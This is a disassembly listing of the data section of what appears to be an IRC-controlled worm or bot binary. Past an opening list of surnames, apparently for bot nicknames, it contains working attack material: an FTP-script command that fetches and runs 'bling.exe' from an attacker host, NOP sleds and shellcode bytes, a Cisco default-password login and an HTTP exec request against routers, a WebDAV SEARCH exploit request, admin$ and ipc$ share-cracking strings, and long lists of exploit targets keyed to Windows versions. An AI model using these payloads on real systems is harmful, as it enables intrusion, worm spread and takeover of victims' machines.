aAyling db 'Ayling',0 ; DATA XREF: .data:0043C5C4�o
align 4
aAykroyd db 'Aykroyd',0 ; DATA XREF: .data:0043C5C0�o
aAyiemba db 'Ayiemba',0 ; DATA XREF: .data:0043C5BC�o
aAxworthy db 'Axworthy',0 ; DATA XREF: .data:0043C5B8�o
align 4
aAxelrod db 'Axelrod',0 ; DATA XREF: .data:0043C5B4�o
aAurelius db 'Aurelius',0 ; DATA XREF: .data:0043C5B0�o
align 4
aAugustus db 'Augustus',0 ; DATA XREF: .data:0043C5AC�o
align 4
aAtkins db 'Atkins',0 ; DATA XREF: .data:0043C5A8�o
align 4
aArky db 'Arky',0 ; DATA XREF: .data:0043C5A4�o
align 4
aArjas db 'Arjas',0 ; DATA XREF: .data:0043C5A0�o
align 4
aAristotle db 'Aristotle',0 ; DATA XREF: .data:0043C59C�o
align 4
aArellano db 'Arellano',0 ; DATA XREF: .data:0043C598�o
align 4
aArduini db 'Arduini',0 ; DATA XREF: .data:0043C594�o
aArbia db 'Arbia',0 ; DATA XREF: .data:0043C590�o
align 4
aAntos db 'Antos',0 ; DATA XREF: .data:0043C58C�o
align 4
aAnthony db 'Anthony',0 ; DATA XREF: .data:0043C588�o
aAnsley db 'Ansley',0 ; DATA XREF: .data:0043C584�o
align 4
aAnfinrud db 'Anfinrud',0 ; DATA XREF: .data:0043C580�o
align 4
aAndron db 'Andron',0 ; DATA XREF: .data:0043C57C�o
align 10h
aAndrelus db 'Andrelus',0 ; DATA XREF: .data:0043C578�o
align 4
aAndo db 'Ando',0 ; DATA XREF: .data:0043C574�o
align 4
aAndel db 'Andel',0 ; DATA XREF: .data:0043C570�o
align 4
aAnand db 'Anand',0 ; DATA XREF: .data:0043C56C�o
align 4
aAmsden db 'Amsden',0 ; DATA XREF: .data:0043C568�o
align 4
aAmeer db 'Ameer',0 ; DATA XREF: .data:0043C564�o
align 4
aAmatangelo db 'Amatangelo',0 ; DATA XREF: .data:0043C560�o
align 10h
aAmaral db 'Amaral',0 ; DATA XREF: .data:0043C55C�o
align 4
aAltenhofen db 'Altenhofen',0 ; DATA XREF: .data:0043C558�o
align 4
aAltenberger db 'Altenberger',0 ; DATA XREF: .data:0043C554�o
aAltavilla db 'Altavilla',0 ; DATA XREF: .data:0043C550�o
align 4
aAlongi db 'Alongi',0 ; DATA XREF: .data:0043C54C�o
align 4
aAllison db 'Allison',0 ; DATA XREF: .data:0043C548�o
aAleks db 'Aleks',0 ; DATA XREF: .data:0043C544�o
align 4
aAlda db 'Alda',0 ; DATA XREF: .data:0043C540�o
align 4
aAlcorn db 'Alcorn',0 ; DATA XREF: .data:0043C53C�o
align 4
aAlavi db 'Alavi',0 ; DATA XREF: .data:0043C538�o
align 4
aAhlers db 'Ahlers',0 ; DATA XREF: .data:0043C534�o
align 4
aAdorno db 'Adorno',0 ; DATA XREF: .data:0043C530�o
align 4
aAdibe db 'Adibe',0 ; DATA XREF: .data:0043C52C�o
align 4
aAdelstein db 'Adelstein',0 ; DATA XREF: .data:0043C528�o
align 10h
aAddison db 'Addison',0 ; DATA XREF: .data:0043C524�o
aAdams db 'Adams',0 ; DATA XREF: .data:0043C520�o
align 10h
aAckerman db 'Ackerman',0 ; DATA XREF: .data:0043C51C�o
align 4
aAbdulrazak db 'Abdulrazak',0 ; DATA XREF: .data:off_43C518�o
align 4
aPc db 'PC',0 ; DATA XREF: .text:0040A935�o
align 4
aS_8 db '%s|',0 ; DATA XREF: .text:0040A9B5�o
aS_7 db '[%s]|',0 ; DATA XREF: .text:0040AA9D�o
align 4
a??? db '???',0 ; DATA XREF: .text:loc_40AA94�o
; sub_41D779:loc_41D81A�o
a2k3 db '2K3',0 ; DATA XREF: .text:0040AA8D�o
aXp_0 db 'XP',0 ; DATA XREF: .text:0040AA82�o
; sub_41D779+8B�o
align 4
a2k db '2K',0 ; DATA XREF: .text:0040AA75�o
; sub_41D779+7C�o
align 4
aMe_0 db 'ME',0 ; DATA XREF: .text:0040AA62�o
; sub_41D779+68�o
align 4
a98 db '98',0 ; DATA XREF: .text:0040AA55�o
; sub_41D779+59�o
align 10h
aNt_0 db 'NT',0 ; DATA XREF: .text:0040AA48�o
; sub_41D779+4A�o
align 4
a95 db '95',0 ; DATA XREF: .text:0040AA3D�o
; sub_41D779+39�o
align 4
; char aDS[]
aDS db '[%d]%s',0 ; DATA XREF: sub_40AAE6+3A�o
align 10h
; char aM[]
aM db '[M]',0 ; DATA XREF: sub_40AAE6+2C�o
; sub_40AAE6+51�o
aMirc_0 db 'mIRC',0 ; DATA XREF: sub_40AAE6+18�o
; sub_41AD95+6�o
align 4
dword_4329BC dd 234032Dh, 65726874h, 6C206461h, 2747369h, 202D03h
; DATA XREF: sub_40AEF0+10�o
; char aSNoSThreadFoun[]
aSNoSThreadFoun db '%s No %s thread found.',0 ; DATA XREF: sub_40B0BB+51�o
align 4
; char aSSStopped_DThr[]
aSSStopped_DThr db '%s %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40B0BB+35�o
align 10h
; char aTotalDInS_[]
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40B3C5+86�o
align 4
; char asc_432A24[]
asc_432A24 db ' ' ; DATA XREF: sub_40B3C5+47�o
db 3, 37h, 25h
dd 203A0373h, 2C6425h
; char asc_432A30[]
asc_432A30 db '-' ; DATA XREF: sub_40B3C5+11�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aExploitStatist db 'Exploit Statistics:',0
; char asc_432A50[]
asc_432A50 db '-' ; DATA XREF: sub_40B494+37�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
db 54h ; T
db 72h, 61h, 6Eh
db 73h ; s
db 66h, 65h, 72h
db 20h
db 53h, 74h, 61h
db 74h ; t
db 69h, 73h, 74h
db 69h ; i
db 63h, 73h, 3Ah
db 20h
db 2, 54h, 46h
db 54h ; T
db 50h, 2, 3Ah
db 20h
db 25h, 64h, 2Ch
db 20h
db 2, 46h, 54h
db 50h ; P
db 2, 3Ah, 20h
aDTotalDInS_ db '%d, Total %d in %s.',0
; char asc_432A98[]
asc_432A98 db '-' ; DATA XREF: sub_40B4FF+21�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aDConnectbackSh db '%d connectback shells in %s.',0
align 4
; char aScanTimeS_[]
aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40B553+7E�o
; char asc_432AD4[]
asc_432AD4 db ' ' ; DATA XREF: sub_40B553+40�o
db 3, 37h, 25h
dd 28200373h, 73253403h, 2C2903h
; char asc_432AE4[]
asc_432AE4 db '-' ; DATA XREF: sub_40B553+14�o
db 3, 34h, 2
dd 6E616373h, 202D0302h, 6C707845h, 2074696Fh, 7473694Ch
dd 3Ah
; char asc_432B00[]
asc_432B00 db '-' ; DATA XREF: sub_40B619+42�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanNotActive_ db 'Scan not active.',0
align 10h
; char asc_432B20[]
asc_432B20 db '-' ; DATA XREF: sub_40B619+2C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aCurrentIpS_ db 'Current IP: %s.',0
; char asc_432B3C[]
asc_432B3C db '-' ; DATA XREF: sub_40B690+49C�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_33 db ' Failed to start server, error: <%d>.',0
align 10h
; char asc_432B70[]
asc_432B70 db '-' ; DATA XREF: sub_40B690+386�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aFailedToSta_34 db '- Failed to start server, error: <%d>.',0
; char asc_432BA8[]
asc_432BA8 db '-' ; DATA XREF: sub_40B690+326�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aServerStarte_2 db '- Server started on Port: %d.',0
align 4
; char asc_432BD8[]
asc_432BD8 db '-' ; DATA XREF: sub_40B690+25F�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_35 db 'Failed to start server, error: <%d>.',0
align 4
; char asc_432C0C[]
asc_432C0C db '-' ; DATA XREF: sub_40B690+1FF�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aServerStarte_3 db 'Server started on Port: %d, File: %s.',0
align 10h
; char asc_432C40[]
asc_432C40 db '-' ; DATA XREF: sub_40B690+137�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_36 db ' Failed to start server, error: <%d>.',0
align 4
; char asc_432C74[]
asc_432C74 db '-' ; DATA XREF: sub_40BCF3+DE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOpen db 'IP: %s, Port %d is open.',0
align 4
; char asc_432C9C[]
asc_432C9C db '-' ; DATA XREF: sub_40BCF3+86�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSDScanThread db 'IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
; char asc_432CD4[]
asc_432CD4 db '-' ; DATA XREF: sub_40BEFE+1E5�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
align 4
; char asc_432D14[]
asc_432D14 db '-' ; DATA XREF: sub_40BEFE+16D�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
; char asc_432D4C[]
asc_432D4C db '-' ; DATA XREF: sub_40BEFE+108�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0
; char asc_432D80[]
asc_432D80 db '-' ; DATA XREF: sub_40BEFE+89�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToInitia db 'Failed to initialize critical section.',0
align 4
; char asc_432DB4[]
asc_432DB4 db '-' ; DATA XREF: sub_40C15B+16B�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFinishedExploi db '- finished exploiting %s (%d attempts)',0
; char asc_432DE8[]
asc_432DE8 db '-' ; DATA XREF: sub_40C15B+82�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
db 2Dh, 20h, 74h
db 72h ; r
db 79h, 69h, 6Eh
db 67h ; g
db 20h, 2, 25h
db 73h ; s
db 2, 20h, 6Fh
aNSPortD___ db 'n %s (port %d)...',0
align 4
; char asc_432E18[]
asc_432E18 db '-' ; DATA XREF: sub_40C30A+8C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOp_0 db 'IP: %s Port: %d is open.',0
align 10h
; char asc_432E40[]
asc_432E40 db '-' ; DATA XREF: sub_40C3D3+40�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0
align 4
; char asc_432E68[]
asc_432E68 db '-' ; DATA XREF: sub_40C4C0+CD�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedScanni db 'Finished scanning IP: %s.',0
align 4
; char asc_432E94[]
asc_432E94 db '-' ; DATA XREF: sub_40C4C0+40�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0
align 10h
unk_432EC0 db 2Dh ; - ; DATA XREF: .text:0040C6D6�o
db 3, 34h, 2
db 63h ; c
db 69h, 73h, 63h
db 6Fh ; o
db 28h, 74h, 65h
db 6Ch ; l
db 6Eh, 65h, 74h
db 29h ; )
db 3, 2, 2Dh
aFoundRouterS db ' found router: %s',0
align 4
aUserAccessVeri db 0Dh,0Ah ; DATA XREF: .text:0040C6B1�o
db 0Dh,0Ah
db 'User Access Verification',0Dh,0Ah
db 0Dh,0Ah
db 'Password',0
align 4
aPass db 0Dh,0Ah ; DATA XREF: .text:0040C69A�o
db 'Pass',0
align 4
aCisco db 'cisco',0Dh,0 ; DATA XREF: .text:0040C675�o
align 4
unk_432F24 db 2Dh ; - ; DATA XREF: .text:0040C83F�o
db 3, 34h, 2
db 63h ; c
db 69h, 73h, 63h
db 6Fh ; o
db 28h, 68h, 74h
db 74h ; t
db 70h, 29h, 3
db 2
aFoundRouterS_0 db '- found router: %s',0
aHttp1_0200Ok db 'HTTP/1.0 200 OK',0 ; DATA XREF: .text:0040C804�o
aGetLevel16Exec db 'GET /level/16/exec/-///pwd HTTP/1.0',0Ah ; DATA XREF: .text:0040C7A1�o
db 0Ah,0
align 10h
dword_432F80 dd 0 ; DATA XREF: sub_40C89B+9A�o
asc_432F84: ; DATA XREF: sub_40C89B+17�o
; sub_40C979+17�o
unicode 0, <\\>,0
align 4
off_432F8C dd offset dword_49005C ; DATA XREF: sub_40C89B+C�o
; sub_40C979+C�o
dd offset aVonhoffman+4
dd 24h
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: .text:0040CC88�o
align 4
aThcownziis db 'THCOWNZIIS!',0 ; DATA XREF: .text:0040CF5E�o
dword_432FB8 dd 0FEBh ; DATA XREF: .text:0040CF53�o
; char aBling_exe[]
aBling_exe db 'bling.exe',0Dh,0Ah,0 ; DATA XREF: sub_40D055+85�o
; char aEchoOpenSDOEch[]
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: sub_40D055+42�o
db 'echo quit >> o &ftp -n -s:o',0Dh,0Ah,0
align 4
a7_0 db '7.0',0 ; DATA XREF: .text:0040D7CF�o
a6_0 db '6.0',0 ; DATA XREF: .text:0040D7BE�o
a5_0 db '5.0',0 ; DATA XREF: .text:0040D7AD�o
a4_0 db '4.0',0 ; DATA XREF: .text:0040D79C�o
aHotfix2 db 'hotfix2',0 ; DATA XREF: .text:loc_40D78B�o
a8_15 db '8.15',0 ; DATA XREF: .text:loc_40D75E�o
align 4
a8_14 db '8.14',0 ; DATA XREF: .text:loc_40D604�o
align 10h
a8_13 db '8.13',0 ; DATA XREF: .text:loc_40D5DA�o
align 4
a8_12 db '8.12',0 ; DATA XREF: .text:loc_40D5B0�o
align 10h
a8_11 db '8.11',0 ; DATA XREF: .text:loc_40D583�o
align 4
a8_10 db '8.10',0 ; DATA XREF: .text:loc_40D556�o
align 10h
a8_05 db '8.05',0 ; DATA XREF: .text:loc_40D529�o
align 4
a8_04 db '8.04',0 ; DATA XREF: .text:loc_40D4FC�o
align 10h
a8_03 db '8.03',0 ; DATA XREF: .text:loc_40D4CF�o
align 4
a8_02 db '8.02',0 ; DATA XREF: .text:loc_40D4A2�o
align 10h
a8_01 db '8.01',0 ; DATA XREF: .text:loc_40D475�o
align 4
a8_00 db '8.00',0 ; DATA XREF: .text:loc_40D448�o
align 10h
a7_15 db '7.15',0 ; DATA XREF: .text:loc_40D41B�o
align 4
a7_14 db '7.14',0 ; DATA XREF: .text:0040D3EE�o
align 10h
a7_13 db '7.13',0 ; DATA XREF: .text:loc_40D3DD�o
align 4
a7_12 db '7.12',0 ; DATA XREF: .text:loc_40D3B0�o
align 10h
a7_11 db '7.11',0 ; DATA XREF: .text:0040D383�o
align 4
a7_10 db '7.10',0 ; DATA XREF: .text:loc_40D372�o
align 10h
a7_07 db '7.07',0 ; DATA XREF: .text:0040D348�o
align 4
a7_06 db '7.06',0 ; DATA XREF: .text:loc_40D337�o
align 10h
a7_05 db '7.05',0 ; DATA XREF: .text:loc_40D30D�o
align 4
a7_04 db '7.04',0 ; DATA XREF: .text:0040D2DB�o
align 10h
aImail db 'IMail',0 ; DATA XREF: .text:0040D2C1�o
; .text:loc_40D7DE�o
align 4
dword_4330F8 dd 6EB06EBh, 0 ; DATA XREF: sub_40D7FE+17A�o
; sub_40DDD9+1A2�o
; char aSIpc[]
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40D7FE+27�o
; sub_40DDD9+27�o ...
align 4
dword_43310C dd 1CEC8166h ; DATA XREF: sub_40D7FE+D�r
; sub_40DDD9+D�r
dword_433110 dd 0E4FF07h ; DATA XREF: sub_40D7FE+16�r
; sub_40DDD9+16�r
; char aMsgBodySizeD[]
aMsgBodySizeD db '[*] Msg body size: %d',0Ah,0 ; DATA XREF: sub_40E3B2+177�o
align 4
aMessage db '*** MESSAGE ***',0 ; DATA XREF: sub_40E3B2+51�o
dword_43313C dd 90909090h, 909010EBh, 90909090h, 0 ; DATA XREF: sub_40E3B2+42�o
dword_43314C dd 90909090h, 5803EB90h, 0F8E805EBh, 0B9FFFFFFh, 0FFFFFFFFh
; DATA XREF: sub_40E3B2+35�o
dd 0EE7FE981h, 0C12BFFFFh, 0E0FFh
aAdik db 'ADIK',0 ; DATA XREF: sub_40E3B2+28�o
align 4
aNetmaniac db 'NETMANIAC',0 ; DATA XREF: sub_40E3B2+1C�o
align 10h
dword_433180 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_40E3B2+10�o
dd 0FFFFFFFFh, 0
aWindowsXpSp1En db 'Windows XP SP 1 (en)',0 ; DATA XREF: .text:0040E5D0�o
align 4
aWindows2000Sp3 db 'Windows 2000 SP 3 (en)',0 ; DATA XREF: .text:0040E5A9�o
align 10h
; char asc_4331C0[]
asc_4331C0: ; DATA XREF: sub_40E971+31E�o
unicode 0, <`>,0
; char dword_4331C4[]
dword_4331C4 dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40E971+2F2�o
; char dword_4331D0[]
dword_4331D0 dd 30h ; DATA XREF: sub_40E971+2C6�o
; char dword_4331D4[]
dword_4331D4 dd 0A1h ; DATA XREF: sub_40E971+29A�o
dword_4331D8 dd 3 ; DATA XREF: sub_40E971+243�o
; char aCccc[]
aCccc db 'CCCC',0 ; DATA XREF: sub_40E971+14B�o
align 4
; char dword_4331E4[]
dword_4331E4 dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_40E971+E0�o
dbl_4331F0 dq 1.388888888888889e-2 ; DATA XREF: sub_40EEBD+3A�r
dbl_4331F8 dq 1.666666666666667e-1 ; DATA XREF: sub_40EEBD:loc_40EED8�r
dbl_433200 dq 4.294967296e9 ; DATA XREF: sub_40EEBD+15�r
; sub_40EEBD+30�r ...
dbl_433208 dq 1.333333333333333 ; DATA XREF: sub_40F47A:loc_40F4F1�r
; char aGetHttp1_0Host[]
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40F5F6+63�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: .text:0040F728�o
db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0
align 4
; char aAdmin[]
aAdmin db 'admin$',0 ; DATA XREF: sub_40F87A+3D�o
align 4
; char asc_4332BC[]
asc_4332BC: ; DATA XREF: sub_40F87A+32�o
; sub_414B1C+2C�o
unicode 0, <\>,0
; char asc_4332C0[]
asc_4332C0 db '\\',0 ; DATA XREF: sub_40F87A+19�o
align 4
a8a885d041ceb11 db '8a885d04-1ceb-11c9-9fe8-08002b104860',0 ; DATA XREF: sub_40FA56+C�o
align 4
aFdb3a030065f11 db 'fdb3a030-065f-11d1-bb9b-00a024ea5525',0 ; DATA XREF: .text:0040FB79�o
align 4
; char asc_433314[]
asc_433314 db '-' ; DATA XREF: sub_40FDC3+211�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 62h
db 69h ; i
db 6Fh, 73h, 3
db 2
aExploitingIpSS db '- Exploiting IP: %s, Share: \%s, User: (%s/%s)',0
aNoPassword db '(no password)',0 ; DATA XREF: sub_40FDC3+1EA�o
align 10h
; char aSSS_2[]
aSSS_2 db '%s\%s\%s',0 ; DATA XREF: sub_40FDC3+CA�o
align 4
aCWindowsSystem db 'c$\windows\system32',0 ; DATA XREF: sub_40FDC3+71�o
aCWinntSystem32 db 'c$\winnt\system32',0 ; DATA XREF: sub_40FDC3+6A�o
align 4
aAdminSystem32 db 'Admin$\system32',0 ; DATA XREF: sub_40FDC3+63�o
; char aSIpc_0[]
aSIpc_0 db '%s\ipc$',0 ; DATA XREF: sub_4100AE+53�o
; char aS_1[]
aS_1 db '\\%s',0 ; DATA XREF: sub_4100AE+15�o
; sub_410F37+124�o
align 4
aSPipeLsarpc db '\\%s\pipe\lsarpc',0 ; DATA XREF: .text:004105C6�o
align 4
aSIpc_1 db '\\%s\IPC$',0 ; DATA XREF: .text:00410818�o
align 4
; char aSD_1[]
aSD_1 db '%s%d',0Dh,0Ah ; DATA XREF: sub_410BF8+143�o
db 0Dh,0Ah,0
align 10h
; char aSearchSHttp1_1[]
aSearchSHttp1_1 db 'SEARCH /%s HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_410BF8+127�o
db 'Host: %s',0Dh,0Ah
db 'Content-type: text/xml',0Dh,0Ah
db 'Content-Length: ',0
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah ; DATA XREF: sub_410BF8+40�o
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
aWin2kSp0FromPh db 'Win2K SP0 From PhaTTy 1',0
aWin2kSp1FromPh db 'Win2K SP1 From PhaTTy 2',0
aWin2kSp2FromPh db 'Win2K SP2 From PhaTTy 1',0
aWin2kSp3FromPh db 'Win2K SP3 From PhaTTy 1',0
aWin2kSp4FromPh db 'Win2K SP4 From PhaTTy 3',0
aWin2kSp4From_0 db 'Win2K SP4 From PhaTTy 2',0
aWin2kSp1From_0 db 'Win2K SP1 From PhaTTy 1',0
aWin2kSp4From_1 db 'Win2K SP4 From PhaTTy 1',0
aDosXpAll db 'DoS XP ALL',0
align 4
aWindowsUk2k3Ee db 'Windows uk 2k3 ee sp0 24',0
align 4
aWindowsUk2k3_0 db 'Windows uk 2k3 ee sp0 23',0
align 4
aWindowsUk2k3_1 db 'Windows uk 2k3 ee sp0 22',0
align 10h
aWindowsUk2k3_2 db 'Windows uk 2k3 ee sp0 21',0
align 4
aWindowsUk2k3_3 db 'Windows uk 2k3 ee sp0 20',0
align 4
aWindowsUk2k3_4 db 'Windows uk 2k3 ee sp0 19',0
align 4
aWindowsUk2k3_5 db 'Windows uk 2k3 ee sp0 18',0
align 10h
aWindowsUk2k3_6 db 'Windows uk 2k3 ee sp0 17',0
align 4
aWindowsUk2k3_7 db 'Windows uk 2k3 ee sp0 16',0
align 4
aWindowsUk2k3_8 db 'Windows uk 2k3 ee sp0 15',0
align 4
aWindowsUk2k3_9 db 'Windows uk 2k3 ee sp0 14',0
align 10h
aWindowsUk2k_10 db 'Windows uk 2k3 ee sp0 13',0
align 4
aWindowsUk2k_11 db 'Windows uk 2k3 ee sp0 12',0
align 4
aWindowsUk2k_12 db 'Windows uk 2k3 ee sp0 11',0
align 4
aWindowsUk2k_13 db 'Windows uk 2k3 ee sp0 10',0
align 10h
aWindowsUk2k_14 db 'Windows uk 2k3 ee sp0 9',0
aWindowsUk2k_15 db 'Windows uk 2k3 ee sp0 8',0
aWindowsUk2k_16 db 'Windows uk 2k3 ee sp0 7',0
aWindowsUk2k_17 db 'Windows uk 2k3 ee sp0 6',0
aWindowsUk2k_18 db 'Windows uk 2k3 ee sp0 5',0
aWindowsUk2k_19 db 'Windows uk 2k3 ee sp0 4',0
aWindowsUk2k_20 db 'Windows uk 2k3 ee sp0 3',0
aWindowsUk2k_21 db 'Windows uk 2k3 ee sp0 2',0
aWindowsUk2k_22 db 'Windows uk 2k3 ee sp0 1',0
aWindowsUk2k3Se db 'Windows uk 2k3 se sp0 24',0
align 4
aWindowsUk2k_23 db 'Windows uk 2k3 se sp0 23',0
align 10h
aWindowsUk2k_24 db 'Windows uk 2k3 se sp0 22',0
align 4
aWindowsUk2k_25 db 'Windows uk 2k3 se sp0 21',0
align 4
aWindowsUk2k_26 db 'Windows uk 2k3 se sp0 20',0
align 4
aWindowsUk2k_27 db 'Windows uk 2k3 se sp0 19',0
align 10h
aWindowsUk2k_28 db 'Windows uk 2k3 se sp0 18',0
align 4
aWindowsUk2k_29 db 'Windows uk 2k3 se sp0 17',0
align 4
aWindowsUk2k_30 db 'Windows uk 2k3 se sp0 16',0
align 4
aWindowsUk2k_31 db 'Windows uk 2k3 se sp0 15',0
align 10h
aWindowsUk2k_32 db 'Windows uk 2k3 se sp0 14',0
align 4
aWindowsUk2k_33 db 'Windows uk 2k3 se sp0 13',0
align 4
aWindowsUk2k_34 db 'Windows uk 2k3 se sp0 12',0
align 4
aWindowsUk2k_35 db 'Windows uk 2k3 se sp0 11',0
align 10h
aWindowsUk2k_36 db 'Windows uk 2k3 se sp0 10',0
align 4
aWindowsUk2k_37 db 'Windows uk 2k3 se sp0 9',0
aWindowsUk2k_38 db 'Windows uk 2k3 se sp0 8',0
aWindowsUk2k_39 db 'Windows uk 2k3 se sp0 7',0
aWindowsUk2k_40 db 'Windows uk 2k3 se sp0 6',0
aWindowsUk2k_41 db 'Windows uk 2k3 se sp0 5',0
aWindowsUk2k_42 db 'Windows uk 2k3 se sp0 4',0
aWindowsUk2k_43 db 'Windows uk 2k3 se sp0 3',0
aWindowsUk2k_44 db 'Windows uk 2k3 se sp0 2',0
aWindowsUk2k_45 db 'Windows uk 2k3 se sp0 1',0
aWindowsUkXpPro db 'Windows uk xp pro sp1 25',0
align 10h
aWindowsUkXpP_0 db 'Windows uk xp pro sp1 24',0
align 4
aWindowsUkXpP_1 db 'Windows uk xp pro sp1 23',0
align 4
aWindowsUkXpP_2 db 'Windows uk xp pro sp1 22',0
align 4
aWindowsUkXpP_3 db 'Windows uk xp pro sp1 21',0
align 10h
aWindowsUkXpP_4 db 'Windows uk xp pro sp1 20',0
align 4
aWindowsUkXpP_5 db 'Windows uk xp pro sp1 19',0
align 4
aWindowsUkXpP_6 db 'Windows uk xp pro sp1 18',0
align 4
aWindowsUkXpP_7 db 'Windows uk xp pro sp1 17',0
align 10h
aWindowsUkXpP_8 db 'Windows uk xp pro sp1 16',0
align 4
aWindowsUkXpP_9 db 'Windows uk xp pro sp1 15',0
align 4
aWindowsUkXp_10 db 'Windows uk xp pro sp1 14',0
align 4
aWindowsUkXp_11 db 'Windows uk xp pro sp1 13',0
align 10h
aWindowsUkXp_12 db 'Windows uk xp pro sp1 12',0
align 4
aWindowsUkXp_13 db 'Windows uk xp pro sp1 11',0
align 4
aWindowsUkXp_14 db 'Windows uk xp pro sp1 10',0
align 4
aWindowsUkXp_15 db 'Windows uk xp pro sp1 9',0
aWindowsUkXp_16 db 'Windows uk xp pro sp1 8',0
aWindowsUkXp_17 db 'Windows uk xp pro sp1 7',0
aWindowsUkXp_18 db 'Windows uk xp pro sp1 6',0
aWindowsUkXp_19 db 'Windows uk xp pro sp1 5',0
aWindowsUkXp_20 db 'Windows uk xp pro sp1 4',0
aWindowsUkXp_21 db 'Windows uk xp pro sp1 3',0
aWindowsUkXp_22 db 'Windows uk xp pro sp1 2',0
aWindowsUkXp_23 db 'Windows uk xp pro sp1 1',0 ; DATA XREF: .data:004415A0�o
aWindows2000Sp4 db 'Windows 2000 SP4 GER FAT32',0
align 4
aWindowsNlSp123 db 'Windows nl sp1 23',0
align 4
aWindowsNlSp122 db 'Windows nl sp1 22',0
align 10h
aWindowsNlSp121 db 'Windows nl sp1 21',0
align 4
aWindowsNlSp120 db 'Windows nl sp1 20',0
align 4
aWindowsNlSp119 db 'Windows nl sp1 19',0
align 4
aWindowsNlSp118 db 'Windows nl sp1 18',0
align 10h
aWindowsNlSp117 db 'Windows nl sp1 17',0
align 4
aWindowsNlSp116 db 'Windows nl sp1 16',0
align 4
aWindowsNlSp115 db 'Windows nl sp1 15',0
align 4
aWindowsNlSp114 db 'Windows nl sp1 14',0
align 10h
aWindowsNlSp113 db 'Windows nl sp1 13',0
align 4
aWindowsNlSp112 db 'Windows nl sp1 12',0
align 4
aWindowsNlSp111 db 'Windows nl sp1 11',0
align 4
aWindowsNlSp110 db 'Windows nl sp1 10',0
align 10h
aWindowsNlSp19 db 'Windows nl sp1 9',0
align 4
aWindowsNlSp18 db 'Windows nl sp1 8',0
align 4
aWindowsNlSp17 db 'Windows nl sp1 7',0
align 4
aWindowsNlSp16 db 'Windows nl sp1 6',0
align 10h
aWindowsNlSp15 db 'Windows nl sp1 5',0
align 4
aWindowsNlSp14 db 'Windows nl sp1 4',0
align 4
aWindowsNlSp13 db 'Windows nl sp1 3',0
align 4
